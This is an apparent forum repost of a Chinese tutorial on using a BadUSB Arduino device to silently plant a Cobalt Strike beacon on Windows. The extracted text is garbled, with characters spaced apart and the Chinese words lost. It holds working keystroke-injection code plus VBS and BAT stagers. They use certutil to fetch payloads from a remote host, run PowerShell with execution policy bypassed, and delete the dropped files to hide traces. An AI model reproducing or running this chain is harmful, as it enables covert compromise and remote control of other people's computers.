搜索

[27345] 2020-07-19_BasUSB实现后台静默执行上线CobaltStrike

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-07-19_BasUSB实现后台静默执行上线CobaltStrike B a s U S B 线 C o b a l t S t r i k e   n e a r s e c   N e a r S e c   2 0 2 0 - 0 7 - 1 9     # 0 x 0 1   K 稿 B a d U S B 线 C o b a l t S t r i k e W I N + R   > >   C M D P O W E R S H E L L   > >   P O W E R S H E L L C o b a l t S t r i k e P S 1   > >   线 C M D P O W E R S H E L L 线 C M D K V B S C o b a l t S t r i k e P S 1 # 0 x 0 2   # 0 x 0 3   B a d U S B P O W E R S H E L L . i n o a r d u i n o 1 .   W I N + R C M D R U N . V B S D C M D R U N . V B S # i n c l u d e   < K e y b o a r d . h > v o i d   s e t u p ( )   {     / /   p u t p o w e r   s h e l l   y o u r   s e t u p   c o d e   h e r e ,   t o   r u n   o n c e     K e y b o a r d . b e g i n ( ) ; / /   d e l a y ( 1 0 0 0 ) ; / /   K e y b o a r d . p r e s s ( K E Y _ L E F T _ G U I ) ; / / w i n   d e l a y ( 2 0 0 ) ; K e y b o a r d . p r e s s ( ' r ' ) ; / / r d e l a y ( 2 0 0 ) ;   K e y b o a r d . r e l e a s e ( K E Y _ L E F T _ G U I ) ; K e y b o a r d . r e l e a s e ( ' r ' ) ;   K e y b o a r d . p r e s s ( K E Y _ C A P S _ L O C K ) ; / / K e y b o a r d . r e l e a s e ( K E Y _ C A P S _ L O C K ) ; d e l a y ( 3 0 0 ) ; K e y b o a r d . p r i n t l n ( " c m d   / q   / c   m o d e   c o n : C O L S = 1 5   L I N E S = 1   & &   c e r t u t i l   - u r l c a c h e   - s p l i t   - f   h t t p : / / 0 . 0 . 0 . 0 : 8 8 8 8 / r u n . v b s   d : r u n . v b s   & &   t i m e o u t   / t   1   & &   s t a r t   / B   d : r u n . v b s "   ) ;     / / / / K e y b o a r d . p r i n t l n ( " c m d   / T : 0 1   / K   " @ e c h o   o f f   & &   m o d e   c o n : C O L S = 1 5   L I N E S = 1 " " ) ;       / / K e y b o a r d . p r e s s ( K E Y _ R E T U R N ) ;   K e y b o a r d . r e l e a s e ( K E Y _ R E T U R N ) ;   K e y b o a r d . p r e s s ( K E Y _ R E T U R N ) ; K e y b o a r d . r e l e a s e ( K E Y _ R E T U R N ) ; K e y b o a r d . p r e s s ( K E Y _ C A P S _ L O C K ) ;   K e y b o a r d . r e l e a s e ( K E Y _ C A P S _ L O C K ) ; K e y b o a r d . e n d ( ) ; / /   }   v o i d   l o o p ( )   {     / /   p u t   y o u r   m a i n   c o d e   h e r e ,   t o   r u n   r e p e a t e d l y :   }
# 0 x 0 4   R U N . V B S 1 .   c e r t u t i l P O W E R S H E L L . B A T D 2 .   P O W E R S H E L L . B A T P O W E R S H E L L . B A T 1 .   c e r t u t i l P O W E R S H E L L . P S 1 D 2 .   P O W E R S H E L L . P S 1 3 .   p o w e r s h e l l P O W E R S H E L L . P S 1 C S 线 4 .   线 R V B S 5 .   p o w e r s h e l l 线 6 .   P P S 1 P B A T n e a r s e c s e t   w s = W S c r i p t . C r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) w s . R u n   " c m d   / c   c e r t u t i l   - u r l c a c h e   - s p l i t   - f   h t t p : / / 0 . 0 . 0 . 0 : 8 8 8 8 / P O W E R S H E L L . B A T   d : P O W E R S H E L L . B A T   & &   s t a r t   / B   d : P O W E R S H E L L . B A T " , 0 @ e c h o   o f f c e r t u t i l   - u r l c a c h e   - s p l i t   - f   h t t p : / / 0 . 0 . 0 . 0 : 8 8 8 8 / P O W E R S H E L L . P S 1   d : P O W E R S H E L L . P S 1 T I M E O U T   / T   1 s t a r t   / B   p o w e r s h e l l . e x e   - e x e c u t i o n p o l i c y   b y p a s s   - f i l e   d : P O W E R S H E L L . P S 1 d e l   D : R * . V B S   / f   / s   / q T I M E O U T   / T   1 d e l   D : P * . P S 1   / f   / s   / q d e l   D : P * . B A T   / f   / s   / q e x i t

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理